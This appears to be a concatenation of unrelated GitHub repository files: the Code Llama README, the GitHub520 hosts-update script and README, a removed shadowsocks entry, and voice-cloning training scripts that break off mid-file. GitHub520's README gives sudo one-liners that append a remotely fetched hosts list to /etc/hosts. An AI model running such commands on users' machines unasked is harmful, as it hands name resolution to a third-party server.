# Introducing Code Llama Code Llama is a family of large language models for code based on [Llama 2](https://github.com/facebookresearch/llama) providing state-of-the-art performance among open models, infilling capabilities, support for large input contexts, and zero-shot instruction following ability for programming tasks. We provide multiple flavors to cover a wide range of applications: foundation models (Code Llama), Python specializations (Code Llama - Python), and instruction-following models (Code Llama - Instruct) with 7B, 13B and 34B parameters each. All models are trained on sequences of 16k tokens and show improvements on inputs with up to 100k tokens. 7B and 13B Code Llama and Code Llama - Instruct variants support infilling based on surrounding content. Code Llama was developed by fine-tuning Llama 2 using a higher sampling of code. As with Llama 2, we applied considerable safety mitigations to the fine-tuned versions of the model. For detailed information on model training, architecture and parameters, evaluations, responsible AI and safety refer to our [research paper](https://ai.meta.com/research/publications/code-llama-open-foundation-models-for-code/). Output generated by code generation features of the Llama Materials, including Code Llama, may be subject to third party licenses, including, without limitation, open source licenses. We are unlocking the power of large language models and our latest version of Code Llama is now accessible to individuals, creators, researchers and businesses of all sizes so that they can experiment, innovate and scale their ideas responsibly. This release includes model weights and starting code for pretrained and fine-tuned Llama language models — ranging from 7B to 34B parameters. This repository is intended as a minimal example to load [Code Llama](https://ai.meta.com/research/publications/code-llama-open-foundation-models-for-code/) models and run inference. [comment]: <> (Code Llama models are compatible with the scripts in llama-recipes) ## Download In order to download the model weights and tokenizers, please visit the [Meta website](https://ai.meta.com/resources/models-and-libraries/llama-downloads/) and accept our License. Once your request is approved, you will receive a signed URL over email. Then run the download.sh script, passing the URL provided when prompted to start the download. Make sure that you copy the URL text itself, **do not use the 'Copy link address' option** when you right click the URL. If the copied URL text starts with: https://download.llamameta.net, you copied it correctly. If the copied URL text starts with: https://l.facebook.com, you copied it the wrong way. Pre-requisites: make sure you have `wget` and `md5sum` installed. Then to run the script: `bash download.sh`. Keep in mind that the links expire after 24 hours and a certain amount of downloads. If you start seeing errors such as `403: Forbidden`, you can always re-request a link. ### Model sizes | Model | Size | |-------|----------| | 7B | ~12.55GB | | 13B | 24GB | | 34B | 63GB | | 70B | 131GB | [comment]: <> (Access on Hugging Face, We are also providing downloads on Hugging Face. You must first request a download from the Meta website using the same email address as your Hugging Face account. After doing so, you can request access to any of the models on Hugging Face and within 1-2 days your account will be granted access to all versions.) 
## Setup In a conda environment with PyTorch / CUDA available, clone the repo and run in the top-level directory: ``` pip install -e . ``` ## Inference Different models require different model-parallel (MP) values: | Model | MP | |-------|----| | 7B | 1 | | 13B | 2 | | 34B | 4 | | 70B | 8 | All models, except the 70B python and instruct versions, support sequence lengths up to 100,000 tokens, but we pre-allocate the cache according to `max_seq_len` and `max_batch_size` values. So set those according to your hardware and use-case. ### Pretrained Code Models The Code Llama and Code Llama - Python models are not fine-tuned to follow instructions. They should be prompted so that the expected answer is the natural continuation of the prompt. See `example_completion.py` for some examples. To illustrate, see command below to run it with the `CodeLlama-7b` model (`nproc_per_node` needs to be set to the `MP` value): ``` torchrun --nproc_per_node 1 example_completion.py \ --ckpt_dir CodeLlama-7b/ \ --tokenizer_path CodeLlama-7b/tokenizer.model \ --max_seq_len 128 --max_batch_size 4 ``` Pretrained code models are: the Code Llama models `CodeLlama-7b`, `CodeLlama-13b`, `CodeLlama-34b`, `CodeLlama-70b` and the Code Llama - Python models `CodeLlama-7b-Python`, `CodeLlama-13b-Python`, `CodeLlama-34b-Python`, `CodeLlama-70b-Python`. ### Code Infilling Code Llama and Code Llama - Instruct 7B and 13B models are capable of filling in code given the surrounding context. See `example_infilling.py` for some examples. The `CodeLlama-7b` model can be run for infilling with the command below (`nproc_per_node` needs to be set to the `MP` value): ``` torchrun --nproc_per_node 1 example_infilling.py \ --ckpt_dir CodeLlama-7b/ \ --tokenizer_path CodeLlama-7b/tokenizer.model \ --max_seq_len 192 --max_batch_size 4 ``` Pretrained infilling models are: the Code Llama models `CodeLlama-7b` and `CodeLlama-13b` and the Code Llama - Instruct models `CodeLlama-7b-Instruct`, `CodeLlama-13b-Instruct`. ### Fine-tuned Instruction Models Code Llama - Instruct models are fine-tuned to follow instructions. To get the expected features and performance for the 7B, 13B and 34B variants, a specific formatting defined in [`chat_completion()`](https://github.com/facebookresearch/codellama/blob/main/llama/generation.py#L319-L361) needs to be followed, including the `INST` and `<<SYS>>` tags, `BOS` and `EOS` tokens, and the whitespaces and linebreaks in between (we recommend calling `strip()` on inputs to avoid double-spaces). `CodeLlama-70b-Instruct` requires a separate turn-based prompt format defined in [`dialog_prompt_tokens()`](https://github.com/facebookresearch/codellama/blob/main/llama/generation.py#L506-L548). You can use `chat_completion()` directly to generate answers with all instruct models; it will automatically perform the required formatting. You can also deploy additional classifiers for filtering out inputs and outputs that are deemed unsafe. See the llama-recipes repo for [an example](https://github.com/facebookresearch/llama-recipes/blob/main/src/llama_recipes/inference/safety_utils.py) of how to add a safety checker to the inputs and outputs of your inference code. 
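To make the formatting requirements above concrete, here is a sketch (not a literal transcript of the library's output) of the text that `chat_completion()` assembles for a single-turn dialog with a system message; the `BOS`/`EOS` markers are added as tokens by the tokenizer rather than as text:

```
B_INST, E_INST = "[INST]", "[/INST]"
B_SYS, E_SYS = "<<SYS>>\n", "\n<</SYS>>\n\n"

system = "Provide answers in JavaScript"
user = "Write a function that reverses a string."

print(f"{B_INST} {B_SYS}{system}{E_SYS}{user} {E_INST}")
# [INST] <<SYS>>
# Provide answers in JavaScript
# <</SYS>>
#
# Write a function that reverses a string. [/INST]
```

Multi-turn dialogs repeat this pattern, with each completed (user, assistant) pair wrapped between `BOS` and `EOS` tokens.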
Examples using `CodeLlama-7b-Instruct`: ``` torchrun --nproc_per_node 1 example_instructions.py \ --ckpt_dir CodeLlama-7b-Instruct/ \ --tokenizer_path CodeLlama-7b-Instruct/tokenizer.model \ --max_seq_len 512 --max_batch_size 4 ``` Fine-tuned instruction-following models are: the Code Llama - Instruct models `CodeLlama-7b-Instruct`, `CodeLlama-13b-Instruct`, `CodeLlama-34b-Instruct`, `CodeLlama-70b-Instruct`. Code Llama is a new technology that carries potential risks with use. Testing conducted to date has not — and could not — cover all scenarios. In order to help developers address these risks, we have created the [Responsible Use Guide](https://github.com/facebookresearch/llama/blob/main/Responsible-Use-Guide.pdf). More details can be found in our research papers as well. ## Issues Please report any software “bug”, or other problems with the models through one of the following means: - Reporting issues with the model: [github.com/facebookresearch/codellama](http://github.com/facebookresearch/codellama) - Reporting risky content generated by the model: [developers.facebook.com/llama_output_feedback](http://developers.facebook.com/llama_output_feedback) - Reporting bugs and security concerns: [facebook.com/whitehat/info](http://facebook.com/whitehat/info) ## Model Card See [MODEL_CARD.md](MODEL_CARD.md) for the model card of Code Llama. ## License Our model and weights are licensed for both researchers and commercial entities, upholding the principles of openness. Our mission is to empower individuals, and industry through this opportunity, while fostering an environment of discovery and ethical AI advancements. See the [LICENSE](https://github.com/facebookresearch/llama/blob/main/LICENSE) file, as well as our accompanying [Acceptable Use Policy](https://github.com/facebookresearch/llama/blob/main/USE_POLICY.md) ## References 1. [Code Llama Research Paper](https://ai.meta.com/research/publications/code-llama-open-foundation-models-for-code/) 2. [Code Llama Blog Post](https://ai.meta.com/blog/code-llama-large-language-model-coding/)
GitHub520
586c0d2e2bebb5962c4419edada24a3a416c9e3d
File: fetch_ips.py #!/usr/bin/env python # -*- coding:utf-8 -*- # # Author : XueWeiHan # E-mail : [email protected] # Date : 2020-05-19 15:27 # Desc : 获取最新的 GitHub 相关域名对应 IP import os import re import json from typing import Any, Optional from datetime import datetime, timezone, timedelta from pythonping import ping from requests_html import HTMLSession from retry import retry GITHUB_URLS = [ 'alive.github.com', 'api.github.com', 'assets-cdn.github.com', 'avatars.githubusercontent.com', 'avatars0.githubusercontent.com', 'avatars1.githubusercontent.com', 'avatars2.githubusercontent.com', 'avatars3.githubusercontent.com', 'avatars4.githubusercontent.com', 'avatars5.githubusercontent.com', 'camo.githubusercontent.com', 'central.github.com', 'cloud.githubusercontent.com', 'codeload.github.com', 'collector.github.com', 'desktop.githubusercontent.com', 'favicons.githubusercontent.com', 'gist.github.com', 'github-cloud.s3.amazonaws.com', 'github-com.s3.amazonaws.com', 'github-production-release-asset-2e65be.s3.amazonaws.com', 'github-production-repository-file-5c1aeb.s3.amazonaws.com', 'github-production-user-asset-6210df.s3.amazonaws.com', 'github.blog', 'github.com', 'github.community', 'github.githubassets.com', 'github.global.ssl.fastly.net', 'github.io', 'github.map.fastly.net', 'githubstatus.com', 'live.github.com', 'media.githubusercontent.com', 'objects.githubusercontent.com', 'pipelines.actions.githubusercontent.com', 'raw.githubusercontent.com', 'user-images.githubusercontent.com', 'vscode.dev', 'education.github.com', 'private-user-images.githubusercontent.com' ] HOSTS_TEMPLATE = """# GitHub520 Host Start {content} # Update time: {update_time} # Update url: https://raw.hellogithub.com/hosts # Star me: https://github.com/521xueweihan/GitHub520 # GitHub520 Host End\n""" def write_file(hosts_content: str, update_time: str) -> bool: output_doc_file_path = os.path.join(os.path.dirname(__file__), "README.md") template_path = os.path.join(os.path.dirname(__file__), "README_template.md") write_host_file(hosts_content) if os.path.exists(output_doc_file_path): with open(output_doc_file_path, "r") as old_readme_fb: old_content = old_readme_fb.read() if old_content: old_hosts = old_content.split("```bash")[1].split("```")[0].strip() old_hosts = old_hosts.split("# Update time:")[0].strip() hosts_content_hosts = hosts_content.split("# Update time:")[ 0].strip() if old_hosts == hosts_content_hosts: print("host not change") return False with open(template_path, "r") as temp_fb: template_str = temp_fb.read() hosts_content = template_str.format(hosts_str=hosts_content, update_time=update_time) with open(output_doc_file_path, "w") as output_fb: output_fb.write(hosts_content) return True def write_host_file(hosts_content: str) -> None: output_file_path = os.path.join(os.path.dirname(__file__), 'hosts') with open(output_file_path, "w") as output_fb: output_fb.write(hosts_content) def write_json_file(hosts_list: list) -> None: output_file_path = os.path.join(os.path.dirname(__file__), 'hosts.json') with open(output_file_path, "w") as output_fb: json.dump(hosts_list, output_fb) def get_best_ip(ip_list: list) -> str: ping_timeout = 2 best_ip = '' min_ms = ping_timeout * 1000 for ip in ip_list: ping_result = ping(ip, timeout=ping_timeout) print(ping_result.rtt_avg_ms) if ping_result.rtt_avg_ms == ping_timeout * 1000: # 超时认为 IP 失效 continue else: if ping_result.rtt_avg_ms < min_ms: min_ms = ping_result.rtt_avg_ms best_ip = ip return best_ip @retry(tries=3) def get_json(session: Any) -> Optional[list]: url = 
'https://raw.hellogithub.com/hosts.json' try: rs = session.get(url) data = json.loads(rs.text) return data except Exception as ex: print(f"get: {url}, error: {ex}") raise Exception @retry(tries=3) def get_ip(session: Any, github_url: str) -> Optional[str]: url = f'https://sites.ipaddress.com/{github_url}' headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)' ' AppleWebKit/537.36 (KHTML, like Gecko) Chrome/1' '06.0.0.0 Safari/537.36'} try: rs = session.get(url, headers=headers, timeout=5) table = rs.html.find('#dns', first=True) pattern = r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b" ip_list = re.findall(pattern, table.text) best_ip = get_best_ip(ip_list) if best_ip: return best_ip else: raise Exception(f"url: {github_url}, ipaddress empty") except Exception as ex: print(f"get: {url}, error: {ex}") raise Exception def main(verbose=False) -> None: if verbose: print('Start script.') session = HTMLSession() content = "" content_list = get_json(session) for item in content_list: content += item[0].ljust(30) + item[1] + "\n" # content_list = [] # for index, github_url in enumerate(GITHUB_URLS): # try: # ip = get_ip(session, github_url) # content += ip.ljust(30) + github_url + "\n" # content_list.append((ip, github_url,)) # except Exception: # continue # if verbose: # print(f'process url: {index + 1}/{len(GITHUB_URLS)}') if not content: return update_time = datetime.utcnow().astimezone( timezone(timedelta(hours=8))).replace(microsecond=0).isoformat() hosts_content = HOSTS_TEMPLATE.format(content=content, update_time=update_time) has_change = write_file(hosts_content, update_time) if has_change: write_json_file(content_list) if verbose: print(hosts_content) print('End script.') if __name__ == '__main__': main(True)
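A minimal sketch of how `main()` above turns the `(ip, domain)` pairs fetched from `hosts.json` into hosts lines: each IP is left-justified to a 30-column field so the domains line up, and the resulting block is wrapped in `HOSTS_TEMPLATE` together with the UTC+8 update time. The sample data below is illustrative only:

```
pairs = [
    ("140.82.113.3", "github.com"),
    ("185.199.108.133", "raw.githubusercontent.com"),
]

content = "".join(ip.ljust(30) + domain + "\n" for ip, domain in pairs)
print(content)  # a 30-column IP field followed by the domain, one host per line
```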
# GitHub520 <p align="center"> <a href="https://hellogithub.com/repository/d05ff820bf36470581c02cda5cbd17ea" target="_blank"><img src="https://api.hellogithub.com/v1/widgets/recommend.svg?rid=d05ff820bf36470581c02cda5cbd17ea&claim_uid=8MKvZoxaWt" alt="Featured|HelloGitHub" style="width: 250px; height: 54px;" width="250" height="54" /></a><br> 😘 让你“爱”上 GitHub,解决访问时图裂、加载慢的问题。 </p> > 服务器已续费到 2024.12 共花了:1500+💰 [点击扫码赞助](https://raw.hellogithub.com/code.png),感谢🙏 ## 一、介绍 对 GitHub 说"爱"太难了:访问慢、图片加载不出来。 **本项目无需安装任何程序,仅需 5 分钟。** 通过修改本地 hosts 文件,试图解决: - GitHub 访问速度慢的问题 - GitHub 项目中的图片显示不出的问题 让你"爱"上 GitHub。 *注:* 本项目还处于测试阶段,仅在本机测试通过,如有问题欢迎提 [issues](https://github.com/521xueweihan/GitHub520/issues/new) ## 二、使用方法 下面的地址无需访问 GitHub 即可获取到最新的 hosts 内容: - 文件:`https://raw.hellogithub.com/hosts` - JSON:`https://raw.hellogithub.com/hosts.json` ### 2.1 手动方式 #### 2.1.1 复制下面的内容 ```bash # GitHub520 Host Start 140.82.113.25 alive.github.com 140.82.112.5 api.github.com 185.199.109.153 assets-cdn.github.com 185.199.111.133 avatars.githubusercontent.com 185.199.111.133 avatars0.githubusercontent.com 185.199.111.133 avatars1.githubusercontent.com 185.199.108.133 avatars2.githubusercontent.com 185.199.111.133 avatars3.githubusercontent.com 185.199.108.133 avatars4.githubusercontent.com 185.199.111.133 avatars5.githubusercontent.com 185.199.111.133 camo.githubusercontent.com 140.82.114.22 central.github.com 185.199.111.133 cloud.githubusercontent.com 140.82.112.10 codeload.github.com 140.82.113.22 collector.github.com 185.199.108.133 desktop.githubusercontent.com 185.199.111.133 favicons.githubusercontent.com 140.82.114.3 gist.github.com 52.216.210.241 github-cloud.s3.amazonaws.com 52.217.103.188 github-com.s3.amazonaws.com 3.5.30.129 github-production-release-asset-2e65be.s3.amazonaws.com 52.217.82.92 github-production-repository-file-5c1aeb.s3.amazonaws.com 52.217.132.57 github-production-user-asset-6210df.s3.amazonaws.com 192.0.66.2 github.blog 140.82.113.3 github.com 140.82.114.18 github.community 185.199.110.154 github.githubassets.com 151.101.193.194 github.global.ssl.fastly.net 185.199.109.153 github.io 185.199.111.133 github.map.fastly.net 185.199.109.153 githubstatus.com 140.82.112.26 live.github.com 185.199.111.133 media.githubusercontent.com 185.199.111.133 objects.githubusercontent.com 13.107.42.16 pipelines.actions.githubusercontent.com 185.199.108.133 raw.githubusercontent.com 185.199.108.133 user-images.githubusercontent.com 140.82.114.21 education.github.com 185.199.108.133 private-user-images.githubusercontent.com # Update time: 2024-09-12T10:24:14+08:00 # Update url: https://raw.hellogithub.com/hosts # Star me: https://github.com/521xueweihan/GitHub520 # GitHub520 Host End ``` 该内容会自动定时更新, 数据更新时间:2024-09-12T10:24:14+08:00 #### 2.1.2 修改 hosts 文件 hosts 文件在每个系统的位置不一,详情如下: - Windows 系统:`C:\Windows\System32\drivers\etc\hosts` - Linux 系统:`/etc/hosts` - Mac(苹果电脑)系统:`/etc/hosts` - Android(安卓)系统:`/system/etc/hosts` - iPhone(iOS)系统:`/etc/hosts` 修改方法,把第一步的内容复制到文本末尾: 1. Windows 使用记事本。 2. Linux、Mac 使用 Root 权限:`sudo vi /etc/hosts`。 3. iPhone、iPad 须越狱、Android 必须要 root。 #### 2.1.3 激活生效 大部分情况下是直接生效,如未生效可尝试下面的办法,刷新 DNS: 1. Windows:在 CMD 窗口输入:`ipconfig /flushdns` 2. Linux 命令:`sudo nscd restart`,如报错则须安装:`sudo apt install nscd` 或 `sudo /etc/init.d/nscd restart` 3. 
Mac 命令:`sudo killall -HUP mDNSResponder` **Tips:** 上述方法无效可以尝试重启机器。 ### 2.2 自动方式(SwitchHosts) **Tip**:推荐 [SwitchHosts](https://github.com/oldj/SwitchHosts) 工具管理 hosts 以 SwitchHosts 为例,看一下怎么使用的,配置参考下面: - Hosts 类型: `Remote` - Hosts 标题: 随意 - URL: `https://raw.hellogithub.com/hosts` - 自动刷新: 最好选 `1 小时` 如图: ![](./img/switch-hosts.png) 这样每次 hosts 有更新都能及时进行更新,免去手动更新。 ### 2.3 一行命令 #### Windows 使用命令需要安装[git bash](https://gitforwindows.org/) 复制以下命令保存到本地命名为**fetch_github_hosts** ```shell _hosts=$(mktemp /tmp/hostsXXX) hosts=/c/Windows/System32/drivers/etc/hosts remote=https://raw.hellogithub.com/hosts reg='/# GitHub520 Host Start/,/# Github520 Host End/d' sed "$reg" $hosts > "$_hosts" curl "$remote" >> "$_hosts" cat "$_hosts" > "$hosts" rm "$_hosts" ``` 在**CMD**中执行以下命令,执行前需要替换**git-bash.exe**和**fetch_github_hosts**为你本地的路径,注意前者为windows路径格式后者为shell路径格式 `"C:\Program Files\Git\git-bash.exe" -c "/c/Users/XXX/fetch_github_hosts"` 可以将上述命令添加到windows的task schedular(任务计划程序)中以定时执行 #### GNU(Ubuntu/CentOS/Fedora) `sudo sh -c 'sed -i "/# GitHub520 Host Start/Q" /etc/hosts && curl https://raw.hellogithub.com/hosts >> /etc/hosts'` #### BSD/macOS `sudo sed -i "" "/# GitHub520 Host Start/,/# Github520 Host End/d" /etc/hosts && curl https://raw.hellogithub.com/hosts | sudo tee -a /etc/hosts` 将上面的命令添加到 cron,可定时执行。使用前确保 GitHub520 内容在该文件最后部分。 **在 Docker 中运行,若遇到 `Device or resource busy` 错误,可使用以下命令执行** `cp /etc/hosts ~/hosts.new && sed -i "/# GitHub520 Host Start/Q" ~/hosts.new && curl https://raw.hellogithub.com/hosts >> ~/hosts.new && cp -f ~/hosts.new /etc/hosts` ### 2.4 AdGuard 用户(自动方式) 在 **过滤器>DNS 封锁清单>添加阻止列表>添加一个自定义列表**,配置如下: - 名称:随意 - URL:`https://raw.hellogithub.com/hosts`(和上面 SwitchHosts 使用的一样) 如图: ![](./img/AdGuard-rules.png) 更新间隔在 **设置 > 常规设置 > 过滤器更新间隔(设置一小时一次即可)**,记得勾选上 **使用过滤器和 Hosts 文件以拦截指定域名** ![](./img/AdGuard-rules2.png) **Tip**:不要添加在 **DNS 允许清单** 内,只能添加在 **DNS 封锁清单** 才管用。 另外,AdGuard for Mac、AdGuard for Windows、AdGuard for Android、AdGuard for IOS 等等 **AdGuard 家族软件** 添加方法均类似。 ## 三、效果对比 之前的样子: ![](./img/old.png) 修改完 hosts 的样子: ![](./img/new.png) ## TODO - [x] 定时自动更新 hosts 内容 - [x] hosts 内容无变动不会更新 - [x] 寻到最优 IP 解析结果 ## 声明 <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/deed.zh"><img alt="知识共享许可协议" style="border-width: 0" src="https://licensebuttons.net/l/by-nc-nd/4.0/88x31.png"></a><br>本作品采用 <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/deed.zh">署名-非商业性使用-禁止演绎 4.0 国际</a> 进行许可。
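For reference, a cross-platform Python sketch of what the one-line commands in section 2.3 do: drop any existing GitHub520 block from the hosts file, then append a freshly fetched one. It must run with administrator/root privileges, and the hosts path below is an assumption that varies by OS:

```
import urllib.request

HOSTS = "/etc/hosts"  # e.g. r"C:\Windows\System32\drivers\etc\hosts" on Windows
MARKER = "# GitHub520 Host Start"

with open(HOSTS, "r", encoding="utf-8") as f:
    kept = f.read().split(MARKER)[0]  # everything before the old GitHub520 block

fresh = urllib.request.urlopen("https://raw.hellogithub.com/hosts").read().decode("utf-8")

with open(HOSTS, "w", encoding="utf-8") as f:
    f.write(kept + fresh)  # rewrite the file with the updated block appended
```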
shadowsocks
938bba32a4008bdde9c064dda6a0597987ddef54
Removed according to regulations.
Real-Time-Voice-Cloning
911679d0c27fb57cde8ef2b5967e9ed2dd543e10
File: encoder_preprocess.py from encoder.preprocess import preprocess_librispeech, preprocess_voxceleb1, preprocess_voxceleb2 from utils.argutils import print_args from pathlib import Path import argparse if __name__ == "__main__": class MyFormatter(argparse.ArgumentDefaultsHelpFormatter, argparse.RawDescriptionHelpFormatter): pass parser = argparse.ArgumentParser( description="Preprocesses audio files from datasets, encodes them as mel spectrograms and " "writes them to the disk. This will allow you to train the encoder. The " "datasets required are at least one of VoxCeleb1, VoxCeleb2 and LibriSpeech. " "Ideally, you should have all three. You should extract them as they are " "after having downloaded them and put them in a same directory, e.g.:\n" "-[datasets_root]\n" " -LibriSpeech\n" " -train-other-500\n" " -VoxCeleb1\n" " -wav\n" " -vox1_meta.csv\n" " -VoxCeleb2\n" " -dev", formatter_class=MyFormatter ) parser.add_argument("datasets_root", type=Path, help=\ "Path to the directory containing your LibriSpeech/TTS and VoxCeleb datasets.") parser.add_argument("-o", "--out_dir", type=Path, default=argparse.SUPPRESS, help=\ "Path to the output directory that will contain the mel spectrograms. If left out, " "defaults to <datasets_root>/SV2TTS/encoder/") parser.add_argument("-d", "--datasets", type=str, default="librispeech_other,voxceleb1,voxceleb2", help=\ "Comma-separated list of the name of the datasets you want to preprocess. Only the train " "set of these datasets will be used. Possible names: librispeech_other, voxceleb1, " "voxceleb2.") parser.add_argument("-s", "--skip_existing", action="store_true", help=\ "Whether to skip existing output files with the same name. Useful if this script was " "interrupted.") parser.add_argument("--no_trim", action="store_true", help=\ "Preprocess audio without trimming silences (not recommended).") args = parser.parse_args() # Verify webrtcvad is available if not args.no_trim: try: import webrtcvad except: raise ModuleNotFoundError("Package 'webrtcvad' not found. This package enables " "noise removal and is recommended. Please install and try again. If installation fails, " "use --no_trim to disable this error message.") del args.no_trim # Process the arguments args.datasets = args.datasets.split(",") if not hasattr(args, "out_dir"): args.out_dir = args.datasets_root.joinpath("SV2TTS", "encoder") assert args.datasets_root.exists() args.out_dir.mkdir(exist_ok=True, parents=True) # Preprocess the datasets print_args(args, parser) preprocess_func = { "librispeech_other": preprocess_librispeech, "voxceleb1": preprocess_voxceleb1, "voxceleb2": preprocess_voxceleb2, } args = vars(args) for dataset in args.pop("datasets"): print("Preprocessing %s" % dataset) preprocess_func[dataset](**args) File: encoder_train.py from utils.argutils import print_args from encoder.train import train from pathlib import Path import argparse if __name__ == "__main__": parser = argparse.ArgumentParser( description="Trains the speaker encoder. You must have run encoder_preprocess.py first.", formatter_class=argparse.ArgumentDefaultsHelpFormatter ) parser.add_argument("run_id", type=str, help= \ "Name for this model. By default, training outputs will be stored to saved_models/<run_id>/. If a model state " "from the same run ID was previously saved, the training will restart from there. Pass -f to overwrite saved " "states and restart from scratch.") parser.add_argument("clean_data_root", type=Path, help= \ "Path to the output directory of encoder_preprocess.py. 
If you left the default " "output directory when preprocessing, it should be <datasets_root>/SV2TTS/encoder/.") parser.add_argument("-m", "--models_dir", type=Path, default="saved_models", help=\ "Path to the root directory that contains all models. A directory <run_name> will be created under this root." "It will contain the saved model weights, as well as backups of those weights and plots generated during " "training.") parser.add_argument("-v", "--vis_every", type=int, default=10, help= \ "Number of steps between updates of the loss and the plots.") parser.add_argument("-u", "--umap_every", type=int, default=100, help= \ "Number of steps between updates of the umap projection. Set to 0 to never update the " "projections.") parser.add_argument("-s", "--save_every", type=int, default=500, help= \ "Number of steps between updates of the model on the disk. Set to 0 to never save the " "model.") parser.add_argument("-b", "--backup_every", type=int, default=7500, help= \ "Number of steps between backups of the model. Set to 0 to never make backups of the " "model.") parser.add_argument("-f", "--force_restart", action="store_true", help= \ "Do not load any saved model.") parser.add_argument("--visdom_server", type=str, default="http://localhost") parser.add_argument("--no_visdom", action="store_true", help= \ "Disable visdom.") args = parser.parse_args() # Run the training print_args(args, parser) train(**vars(args)) File: synthesizer_train.py from pathlib import Path from synthesizer.hparams import hparams from synthesizer.train import train from utils.argutils import print_args import argparse if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("run_id", type=str, help= \ "Name for this model. By default, training outputs will be stored to saved_models/<run_id>/. If a model state " "from the same run ID was previously saved, the training will restart from there. Pass -f to overwrite saved " "states and restart from scratch.") parser.add_argument("syn_dir", type=Path, help= \ "Path to the synthesizer directory that contains the ground truth mel spectrograms, " "the wavs and the embeds.") parser.add_argument("-m", "--models_dir", type=Path, default="saved_models", help=\ "Path to the output directory that will contain the saved model weights and the logs.") parser.add_argument("-s", "--save_every", type=int, default=1000, help= \ "Number of steps between updates of the model on the disk. Set to 0 to never save the " "model.") parser.add_argument("-b", "--backup_every", type=int, default=25000, help= \ "Number of steps between backups of the model. Set to 0 to never make backups of the " "model.") parser.add_argument("-f", "--force_restart", action="store_true", help= \ "Do not load any saved model and restart from scratch.") parser.add_argument("--hparams", default="", help=\ "Hyperparameter overrides as a comma-separated list of name=value pairs") args = parser.parse_args() print_args(args, parser) args.hparams = hparams.parse(args.hparams) # Run the training train(**vars(args)) File: demo_toolbox.py import argparse import os from pathlib import Path from toolbox import Toolbox from utils.argutils import print_args from utils.default_models import ensure_default_models if __name__ == '__main__': parser = argparse.ArgumentParser( description="Runs the toolbox.", formatter_class=argparse.ArgumentDefaultsHelpFormatter ) parser.add_argument("-d", "--datasets_root", type=Path, help= \ "Path to the directory containing your datasets. 
See toolbox/__init__.py for a list of " "supported datasets.", default=None) parser.add_argument("-m", "--models_dir", type=Path, default="saved_models", help="Directory containing all saved models") parser.add_argument("--cpu", action="store_true", help=\ "If True, all inference will be done on CPU") parser.add_argument("--seed", type=int, default=None, help=\ "Optional random number seed value to make toolbox deterministic.") args = parser.parse_args() arg_dict = vars(args) print_args(args, parser) # Hide GPUs from Pytorch to force CPU processing if arg_dict.pop("cpu"): os.environ["CUDA_VISIBLE_DEVICES"] = "-1" # Remind the user to download pretrained models if needed ensure_default_models(args.models_dir) # Launch the toolbox Toolbox(**arg_dict) File: vocoder_train.py import argparse from pathlib import Path from utils.argutils import print_args from vocoder.train import train if __name__ == "__main__": parser = argparse.ArgumentParser( description="Trains the vocoder from the synthesizer audios and the GTA synthesized mels, " "or ground truth mels.", formatter_class=argparse.ArgumentDefaultsHelpFormatter ) parser.add_argument("run_id", type=str, help= \ "Name for this model. By default, training outputs will be stored to saved_models/<run_id>/. If a model state " "from the same run ID was previously saved, the training will restart from there. Pass -f to overwrite saved " "states and restart from scratch.") parser.add_argument("datasets_root", type=Path, help= \ "Path to the directory containing your SV2TTS directory. Specifying --syn_dir or --voc_dir " "will take priority over this argument.") parser.add_argument("--syn_dir", type=Path, default=argparse.SUPPRESS, help= \ "Path to the synthesizer directory that contains the ground truth mel spectrograms, " "the wavs and the embeds. Defaults to <datasets_root>/SV2TTS/synthesizer/.") parser.add_argument("--voc_dir", type=Path, default=argparse.SUPPRESS, help= \ "Path to the vocoder directory that contains the GTA synthesized mel spectrograms. " "Defaults to <datasets_root>/SV2TTS/vocoder/. Unused if --ground_truth is passed.") parser.add_argument("-m", "--models_dir", type=Path, default="saved_models", help=\ "Path to the directory that will contain the saved model weights, as well as backups " "of those weights and wavs generated during training.") parser.add_argument("-g", "--ground_truth", action="store_true", help= \ "Train on ground truth spectrograms (<datasets_root>/SV2TTS/synthesizer/mels).") parser.add_argument("-s", "--save_every", type=int, default=1000, help= \ "Number of steps between updates of the model on the disk. Set to 0 to never save the " "model.") parser.add_argument("-b", "--backup_every", type=int, default=25000, help= \ "Number of steps between backups of the model. 
Set to 0 to never make backups of the " "model.") parser.add_argument("-f", "--force_restart", action="store_true", help= \ "Do not load any saved model and restart from scratch.") args = parser.parse_args() # Process the arguments if not hasattr(args, "syn_dir"): args.syn_dir = args.datasets_root / "SV2TTS" / "synthesizer" if not hasattr(args, "voc_dir"): args.voc_dir = args.datasets_root / "SV2TTS" / "vocoder" del args.datasets_root args.models_dir.mkdir(exist_ok=True) # Run the training print_args(args, parser) train(**vars(args)) File: synthesizer_preprocess_embeds.py from synthesizer.preprocess import create_embeddings from utils.argutils import print_args from pathlib import Path import argparse if __name__ == "__main__": parser = argparse.ArgumentParser( description="Creates embeddings for the synthesizer from the LibriSpeech utterances.", formatter_class=argparse.ArgumentDefaultsHelpFormatter ) parser.add_argument("synthesizer_root", type=Path, help=\ "Path to the synthesizer training data that contains the audios and the train.txt file. " "If you let everything as default, it should be <datasets_root>/SV2TTS/synthesizer/.") parser.add_argument("-e", "--encoder_model_fpath", type=Path, default="saved_models/default/encoder.pt", help=\ "Path your trained encoder model.") parser.add_argument("-n", "--n_processes", type=int, default=4, help= \ "Number of parallel processes. An encoder is created for each, so you may need to lower " "this value on GPUs with low memory. Set it to 1 if CUDA is unhappy.") args = parser.parse_args() # Preprocess the dataset print_args(args, parser) create_embeddings(**vars(args)) File: synthesizer_preprocess_audio.py from synthesizer.preprocess import preprocess_dataset from synthesizer.hparams import hparams from utils.argutils import print_args from pathlib import Path import argparse if __name__ == "__main__": parser = argparse.ArgumentParser( description="Preprocesses audio files from datasets, encodes them as mel spectrograms " "and writes them to the disk. Audio files are also saved, to be used by the " "vocoder for training.", formatter_class=argparse.ArgumentDefaultsHelpFormatter ) parser.add_argument("datasets_root", type=Path, help=\ "Path to the directory containing your LibriSpeech/TTS datasets.") parser.add_argument("-o", "--out_dir", type=Path, default=argparse.SUPPRESS, help=\ "Path to the output directory that will contain the mel spectrograms, the audios and the " "embeds. Defaults to <datasets_root>/SV2TTS/synthesizer/") parser.add_argument("-n", "--n_processes", type=int, default=4, help=\ "Number of processes in parallel.") parser.add_argument("-s", "--skip_existing", action="store_true", help=\ "Whether to overwrite existing files with the same name. 
